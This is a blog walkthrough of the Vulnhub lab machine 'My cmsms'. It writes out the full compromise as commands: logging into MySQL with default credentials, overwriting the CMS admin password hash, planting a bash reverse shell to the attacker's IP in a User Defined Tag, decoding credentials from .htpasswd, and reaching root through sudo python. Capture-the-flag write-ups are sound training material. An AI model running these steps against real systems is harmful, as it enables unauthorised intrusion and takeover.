My cmsms Vulnhub Walkthrough

| | mycmsms: 1 Vulnhub Walkthrough

In this post, we are solving another vulnhub machine My cmsms. This machine is made by Pankaj Verma. and Difficulty of this VM Easy to Intermediate. our goal is to get the root flag present in /root directory. you can download here the VM.

Description

This VM has been designed by Pankaj Verma. this box contains some interesting things about CMS. It has been designed in a way to enhance user’s skills while playing with some privileges. Its a quite forward box but stay aware of rabbit holes.

Network Scanning

Let’s start with netdiscover discovering our target IP address

netdiscover
My cmsms Vulnhub Walkthrough | mycmsms Vulnhub Writeup | mycmsms: 1 Vulnhub Walkthrough

now we have target ip address 192.168.1.3 our next step is enumerating open ports and running services using parameter -A

nmap -A 192.168.1.3
My cmsms Vulnhub Walkthrough | mycmsms Vulnhub Writeup | mycmsms: 1 Vulnhub Walkthrough

After scanning target IP address we have 3 open ports target machine 22/SSH, 80HTTP apache httpd server running and 3306 MySql

Enumeration

we start enumeration by exploring the IP address, but we couldn’t found any useful things, then we move the next step enumerating ports 3306 MySQL service. after try command password we log in with mysql root user as an password root.

mysql -h 192.168.1.3 -u root -p
show databases;
use cmsms_db;
My cmsms Vulnhub Walkthrough | mycmsms Vulnhub Writeup | mycmsms: 1 Vulnhub Walkthrough

we see four databases I choose cmsms_db here we found cms made simple database and tables let’s dump the username, email address, and password. and in the cms_users table, we found one user entry, using the MySQL query command we can update a new password for the admin user.

select username,email,password from cms_users;
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'hackNos'))) where username = 'admin'; 
My cmsms Vulnhub Walkthrough | mycmsms Vulnhub Writeup | mycmsms: 1 Vulnhub Walkthrough

our new password is updated our next step is navigating the login URL and we can successfully login with the admin username and hackNos password.

http://192.168.1.3/admin/login.php
  • USERNAME: admin
  • PASSWORD: hackNos
My cmsms Vulnhub Walkthrough | mycmsms Vulnhub Writeup | mycmsms: 1 Vulnhub Walkthrough

After login with cms panel we go to Extensions -> User Defined Tags now click the edit button user agent and replace the user agent code with bash reverse shell. and here we can execute any Linux command.

system("bash -c 'bash -i >& /dev/tcp/192.168.1.2/4545 0>&1'");

Let’s move the next step starting our netcat payload listener and then we run the curl command execute our payload.

nc -lvp 4545
curl -vv http://192.168.1.3/index.php?page=user-defined-tags

Now we have reverse shell target machine let’s enumerate the machine and find the weakness files and services. and we discover an . extension hidden file apache2 home directory. we open the file and we see an base64 text.

ls | head -n 2
cd admin
ls -la | head -n 5
cat .htpasswd

copy the text and decode with Linux inbuilt base64 tool using parameter -d and again we found another base32 string using the base32.

hmm, we can discover armour user password let’s try to log in with armour user and [email protected] password.

su armour
id
python3 -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

for the privilege escalation we run the sudo -l command and we see we can run the python command with sudo permission without root user password.

wisudo -l
sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
id

now we have root shell target machine. let’s run the cd /root command go to the root directory. our root flag our challenge is completed by reading proof.txt.

cd /root
ls
cat proof.txt

Sumo Vulnhub Walkthrough link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

Leave a Reply

Your email address will not be published. Required fields are marked *